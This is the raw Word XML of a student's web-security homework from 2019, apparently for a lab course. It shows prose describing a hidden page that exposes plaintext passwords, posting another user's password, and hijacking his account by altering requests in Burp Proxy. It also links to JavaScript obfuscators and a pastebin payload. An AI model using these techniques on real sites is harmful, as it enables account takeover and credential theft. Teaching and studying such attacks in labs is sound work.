    <w:p w14:paraId="7DE5F269" w14:textId="10162CCD" w:rsidR="00123137" w:rsidRDefault="00B20F8A" w:rsidP="00123137">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4047EEAF" wp14:editId="746D3805">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1351280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6324600" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21508"/>
                <wp:lineTo x="21557" y="21508"/>
                <wp:lineTo x="21557" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="7" name="Picture 7" descr="drive-download-20190405T170622Z-001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rive-download-20190405T170622Z-001/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137">
        <w:t>April 5, 2019 – 12.07PM (1 friend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635419E7" w14:textId="56F04BFE" w:rsidR="00123137" w:rsidRDefault="00123137">
      <w:r>
        <w:t>TOTAL OF 4 friends as of last screenshot.</w:t>
      </w:r>
      <w:r w:rsidR="00B20F8A">
        <w:t xml:space="preserve"> There have been more </w:t>
      </w:r>
      <w:r w:rsidR="00407157">
        <w:t>added at the time of submitting this homework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C64178B" w14:textId="33C4F858" w:rsidR="00407157" w:rsidRDefault="00407157" w:rsidP="00407157">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1"/>
      <w:r w:rsidRPr="0046286D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">ACTIVITY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> – STEP 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A8FC9B" w14:textId="77777777" w:rsidR="00407157" w:rsidRDefault="00407157" w:rsidP="00407157"/>
    <w:p w14:paraId="26781CB7" w14:textId="0C3236AC" w:rsidR="00407157" w:rsidRPr="00407157" w:rsidRDefault="00407157" w:rsidP="00407157">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69737927" wp14:editId="0F8FC3B8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6332220" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21554"/>
                <wp:lineTo x="21574" y="21554"/>
                <wp:lineTo x="21574" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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05 at 8.25.5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As can be seen below, I was able to find this hidden page when I had an active session on the website. Every user’s password can be viewed in plaintext below. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4440A11C" w14:textId="72EDA01B" w:rsidR="00A85F3D" w:rsidRDefault="00407157">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44B90ED7" wp14:editId="45D0E0BF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3482975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="2956560"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21526"/>
                <wp:lineTo x="21574" y="21526"/>
                <wp:lineTo x="21574" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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05 at 9.06.1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Here is the post I made on my wall with Andy’s password which can be seen above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7190F3" w14:textId="481E72EF" w:rsidR="00A85F3D" w:rsidRDefault="00A85F3D"/>
    <w:p w14:paraId="0E532D88" w14:textId="58D49E66" w:rsidR="00407157" w:rsidRDefault="00407157"/>
    <w:p w14:paraId="19536D0B" w14:textId="77777777" w:rsidR="00407157" w:rsidRDefault="00407157"/>
    <w:p w14:paraId="65D2BC0D" w14:textId="3E84423B" w:rsidR="00A85F3D" w:rsidRDefault="00A85F3D"/>
    <w:p w14:paraId="60852FA3" w14:textId="77777777" w:rsidR="00A85F3D" w:rsidRDefault="00A85F3D"/>
    <w:p w14:paraId="70817626" w14:textId="308B06EE" w:rsidR="00A85F3D" w:rsidRDefault="00A85F3D"/>
    <w:p w14:paraId="22F05870" w14:textId="77777777" w:rsidR="00407157" w:rsidRDefault="00407157"/>
    <w:p w14:paraId="60959A52" w14:textId="31A51281" w:rsidR="00407157" w:rsidRDefault="00407157">
      <w:r>
        <w:t>Lastly, here is the updated password of Andy’s account. I was able to change Andy’s password by using Burp Proxy to change the request that was being sent to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E50B4" w14:textId="104B0E18" w:rsidR="00407157" w:rsidRDefault="00407157"/>
    <w:p w14:paraId="41DDB9CC" w14:textId="6B57E66A" w:rsidR="009B3F4E" w:rsidRDefault="0040715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1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E721635" wp14:editId="0523785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332220" cy="2519680"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21448"/>
                <wp:lineTo x="21574" y="21448"/>
                <wp:lineTo x="21574" y="0"/>
                <wp:lineTo x="0" y="0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05 at 9.07.0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3F4E">
      <w:headerReference w:type="even" r:id="rId23"/>
      <w:headerReference w:type="default" r:id="rId24"/>
      <w:headerReference w:type="first" r:id="rId25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A137C" w14:textId="77777777" w:rsidR="00E5475B" w:rsidRDefault="00E5475B" w:rsidP="00A25AA4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="32BC6135" w14:textId="77777777" w:rsidR="00E5475B" w:rsidRDefault="00E5475B" w:rsidP="00A25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altName w:val="Times New Roman"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Lohit Devanagari">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Liberation Sans">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="01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A29F0" w14:textId="77777777" w:rsidR="00E5475B" w:rsidRDefault="00E5475B" w:rsidP="00A25AA4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0BDC83EC" w14:textId="77777777" w:rsidR="00E5475B" w:rsidRDefault="00E5475B" w:rsidP="00A25A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9EF45" w14:textId="77777777" w:rsidR="00661BB8" w:rsidRDefault="00661B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7DB041" w14:textId="77777777" w:rsidR="0046286D" w:rsidRPr="00421E6C" w:rsidRDefault="0046286D" w:rsidP="0046286D">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00421E6C">
      <w:rPr>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>Smayan Daruka</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="10DF6CEE" w14:textId="77777777" w:rsidR="0046286D" w:rsidRPr="00421E6C" w:rsidRDefault="0046286D" w:rsidP="0046286D">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00421E6C">
      <w:rPr>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>CSEC-380</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="767C3E22" w14:textId="3467BFED" w:rsidR="00661BB8" w:rsidRPr="0046286D" w:rsidRDefault="0046286D" w:rsidP="0046286D">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00421E6C">
      <w:rPr>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>Professor Chaim Sanders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454EA" w14:textId="77777777" w:rsidR="00661BB8" w:rsidRDefault="00661B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3A6"/>
    <w:rsid w:val="00053884"/>
    <w:rsid w:val="001073A6"/>
    <w:rsid w:val="00123137"/>
    <w:rsid w:val="00270B3C"/>
    <w:rsid w:val="002A11D1"/>
    <w:rsid w:val="00317382"/>
    <w:rsid w:val="003C7D9E"/>
    <w:rsid w:val="003F173E"/>
    <w:rsid w:val="00407157"/>
    <w:rsid w:val="00453EB2"/>
    <w:rsid w:val="0046286D"/>
    <w:rsid w:val="00476D84"/>
    <w:rsid w:val="0057390A"/>
    <w:rsid w:val="005D0265"/>
    <w:rsid w:val="005E5259"/>
    <w:rsid w:val="00661BB8"/>
    <w:rsid w:val="007E1DC4"/>
    <w:rsid w:val="00822101"/>
    <w:rsid w:val="00851E6B"/>
    <w:rsid w:val="00874632"/>
    <w:rsid w:val="008A7B21"/>
    <w:rsid w:val="009A59C7"/>
    <w:rsid w:val="009B3F4E"/>
    <w:rsid w:val="00A25AA4"/>
    <w:rsid w:val="00A66F0C"/>
    <w:rsid w:val="00A8060C"/>
    <w:rsid w:val="00A85F3D"/>
    <w:rsid w:val="00B20F8A"/>
    <w:rsid w:val="00B95BBF"/>
    <w:rsid w:val="00BA7844"/>
    <w:rsid w:val="00C547E4"/>
    <w:rsid w:val="00C71214"/>
    <w:rsid w:val="00C90468"/>
    <w:rsid w:val="00CE77F6"/>
    <w:rsid w:val="00DD6A26"/>
    <w:rsid w:val="00E5475B"/>
    <w:rsid w:val="00F55666"/>
    <w:rsid w:val="00F92273"/>
    <w:rsid w:val="00FE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EC7E2E8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{485CB402-3742-485B-94DF-806563B28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A25A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25AA4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A25A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25AA4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BB8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BB8"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Noto Sans CJK SC Regular" w:cs="Mangal"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="16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B20F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d9080@rit.edu" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pastebin.com/raw/pswTMX80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pastebin.com/pswTMX80" TargetMode="Externa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mailto:sd9080@rit.edu" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csec380-core.csec.rit.edu:86/home.php?id=93" TargetMode="External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mailto:sd9080@rit.edu" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:sd9080@rit.edu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www.jsfuck.com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7048</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="90" baseType="variant">
      <vt:variant>
        <vt:i4>1638486</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>42</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/xml/ajax_xmlhttprequest_send.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2293875</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>39</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/js/js_date_methods.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048703</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>36</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/xml/xml_http.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5767260</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>33</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://stackoverflow.com/questions/3038901/how-to-get-the-response-of-xmlhttprequest</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7536717</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>30</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>mailto:sd9080@rit.edu</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2752563</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>27</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.jsfuck.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5308432</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>24</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://pastebin.com/raw/pswTMX80</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5505118</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>21</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://pastebin.com/pswTMX80</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929904</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>18</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cleancss.com/javascript-obfuscate/index.php</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3145824</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>15</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://javascriptobfuscator.com/Javascript-Obfuscator.aspx</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2424949</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>12</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://obfuscator.io/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7143456</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>9</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://csec380-core.csec.rit.edu:86/home.php?id=93</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7536717</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>6</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>mailto:sd9080@rit.edu</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7536717</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>mailto:sd9080@rit.edu</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7536717</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>mailto:sd9080@rit.edu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Smayan Daruka (RIT Student)</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2019-04-06T01:14:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-05T17:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-06T01:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>